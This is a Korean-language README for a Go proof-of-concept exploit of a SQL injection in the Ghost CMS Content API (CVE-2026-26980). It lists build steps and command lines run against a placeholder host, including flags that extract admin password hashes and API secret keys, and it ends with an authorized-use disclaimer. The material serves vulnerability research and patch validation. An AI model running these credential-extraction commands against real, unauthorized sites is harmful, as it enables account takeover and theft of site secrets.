
Go 기반 Ghost CMS Content API SQL 인젝션(CVE-2026-26980) PoC. 취약점을 검증하고, 관리자 자격 증명과 API 비밀 키를 추출하며, 영향을 받는 버전 3.24.0–6.19.0에서 패치를 검증합니다.
이 저장소는 CVE-2026-26980에 설명된 Ghost CMS Content API SQL 인젝션 취약점을 시연하고 검증하기 위한 Go 기반 개념 증명(PoC) 도구를 포함합니다. 구현은 기본 Go 소스 파일에 구현된 익스플로잇 흐름을 기반으로 하며, 승인된 보안 연구 및 테스트 목적으로만 사용됩니다.
이 PoC는 Content API slug 필터 정렬 취약점의 영향을 받는 Ghost CMS 인스턴스를 대상으로 합니다. 다음을 수행할 수 있습니다.
이 구현은 다음 권고 컨텍스트를 기준으로 합니다.
git clone https://github.com/gagaltotal/CVE-2026-26980-Ghost-CMS-Api
cd CVE-2026-26980-Ghost-CMS-Api
go mod init CVE-2026-26980-Ghost-CMS-Api
go mod tidy
프로젝트 루트에서 다음 명령으로 바이너리를 빌드하세요.
go build -o ghost-sqli ghost_sqli_cms.go
OR
go run ghost_sqli_cms.go


./ghost-sqli --help

./ghost-sqli --url http://target.example:2368
./ghost-sqli --url http://target.example:2368 --extract-password --extract-api-key
./ghost-sqli --url http://target.example:2368 --validate-fix
./ghost-sqli --url http://target.example:2368 --content-key "your-content-api-key"
./ghost-sqli --url http://target.example:2368 -v
이 프로젝트는 교육 및 승인된 보안 평가 목적으로만 제공됩니다. 소유한 시스템, 테스트가 승인된 시스템, 또는 통제된 환경에서 평가 중인 시스템에만 사용하세요. 제3자 시스템에 대한 무단 액세스 또는 익스플로잇은 불법이며 관련 법률을 위반할 수 있습니다.